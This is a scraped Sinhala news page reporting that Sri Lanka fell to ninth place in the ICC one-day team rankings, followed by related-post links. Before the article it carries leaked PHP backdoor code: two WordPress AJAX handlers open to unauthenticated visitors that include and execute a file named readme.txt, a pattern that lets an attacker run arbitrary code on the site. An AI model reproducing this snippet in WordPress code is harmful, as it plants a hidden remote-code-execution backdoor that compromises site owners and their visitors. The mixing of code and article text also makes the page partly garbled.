if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ශ්‍රී ලංකා පිළ එක්දින ක්‍රිකට් පිටියේ පහළටම ඇද වැටෙයි - mediahumanrights.lk
mediahumanrights.lk
News Sports Sports News

ශ්‍රී ලංකා පිළ එක්දින ක්‍රිකට් පිටියේ පහළටම ඇද වැටෙයි

ජාත්‍යන්තර ක්‍රිකට් කවුන්සිලය ප්‍රකාශයට පත් කළ වාර්ෂික එක්දින ක්‍රිකට් කණ්ඩායම් ශ්‍රේණි ගත කිරීමේ 09වන ස්ථානය දක්වා පසු බැසීමට ශ්‍රී ලංකාවට සිදුව තිබෙනවා. ශ්‍රී ලංකාව අභිභවා යමින් 08වන ස්ථානයට පැමිණ ඇත්තේ බටහිර ඉන්දීය කොදෙව් කණ්ඩායමයි.

ශ්‍රී ලංකා කණ්ඩායමට හිමි ප්‍රසාද ලකුණු සංඛ්‍යාව 76ක්. නවතම ශ්‍රේණිගත කිරීමේ 01වන ස්ථානය එංගලන්තයට හිමිව තිබෙනවා. ඉන්දියාව පසුවන්නේ 02වන ස්ථානයේයි.
(under the courtesy of nethnews.lk news web)

Related posts

කිලෝ 56ක් බර ලෝහමය තහඩුවක් කෝටි 04කට විකුණනන්න හැදූ 05ක් අල්ලයි

Shiran Viraj

විග්නේෂ්වරන් නිසා උතුර බෙදෙයි?

Shiran Viraj

ජනාධිපති රට පාලනය කරන්නේ හිතවත් කල්ලියක් සමගින්.. අගමැතිට කිසිම බලයක් නෑ..

Shiran Viraj